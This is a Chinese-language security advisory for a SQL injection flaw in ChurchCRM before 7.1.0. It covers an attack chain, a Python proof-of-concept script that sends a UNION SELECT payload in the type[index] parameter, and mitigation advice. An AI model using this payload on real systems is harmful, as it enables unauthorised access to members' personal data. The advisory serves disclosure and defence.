CVE-2026-39334 CVSS 8.8 高危

CVE-2026-39334 ChurchCRM SQL注入漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39334

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM 7.1.0之前的版本中发现了一个SQL注入漏洞。该漏洞位于/SettingsIndividual.php端点，由于未能正确过滤type数组参数中的index值，导致已认证的低权限用户可以注入任意SQL语句。攻击者利用此漏洞可从数据库中提取敏感信息或篡改数据。官方已在7.1.0版本中修复了此问题，建议受影响用户尽快升级。

技术细节

ChurchCRM是一款开源的教会管理软件。在7.1.0之前的版本中，系统核心文件/SettingsIndividual.php存在严重的SQL注入缺陷。漏洞产生的根本原因是后端代码在接收并处理用户传入的type数组参数时，错误地信任了该数组中index索引所对应的值，并将其直接拼接至SQL查询语句中执行，未实施任何有效的输入清洗或参数化查询保护。攻击者无需具备管理员权限，仅需拥有一个普通的有效账户即可发起攻击。利用该漏洞，攻击者可以构造恶意的SQL语句（如利用UNION SELECT进行数据窃取，或利用基于时间的盲注进行信息提取），从而导出数据库中的敏感信息（包括用户名、密码哈希、个人隐私信息等），甚至对数据库进行增删改操作，导致数据完整性被破坏。

攻击链分析

STEP 1

侦察

识别目标系统为ChurchCRM，且版本低于7.1.0。

STEP 2

获取访问权限

使用低权限账号登录系统，获取有效的Session/Cookie。

STEP 3

漏洞利用

向/SettingsIndividual.php端点发送POST请求，在type[index]参数中注入恶意SQL代码。

STEP 4

数据窃取/破坏

通过SQL注入语句读取数据库敏感信息（如管理员密码）或修改数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sqli(target_url, username, password):
    """
    PoC for CVE-2026-39334: SQL Injection in ChurchCRM < 7.1.0
    Vulnerable Endpoint: /SettingsIndividual.php
    Parameter: type[index]
    """
    session = requests.Session()

    # Step 1: Authenticate
    login_url = f"{target_url}/login"
    login_payload = {
        "User": username,
        "Password": password
    }
    session.post(login_url, data=login_payload)

    # Step 2: Send malicious payload
    exploit_url = f"{target_url}/SettingsIndividual.php"
    # Injecting a simple UNION SELECT payload to extract database version
    malicious_payload = {
        "type": {
            "index": "1' UNION SELECT NULL, user(), database(), version()-- -"
        }
    }

    response = session.post(exploit_url, data=malicious_payload)

    if response.status_code == 200:
        print("[+] Potential SQL Injection successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit failed or WAF blocked.")

if __name__ == "__main__":
    target = "http://localhost:8080" # Replace with actual target
    user = "testuser"
    pwd = "password"
    exploit_sqli(target, user, pwd)

影响范围

ChurchCRM < 7.1.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议通过Web应用防火墙（WAF）拦截针对/SettingsIndividual.php的非法请求，特别是包含SQL关键词的参数。同时，应暂时禁用普通用户访问系统设置相关页面的权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表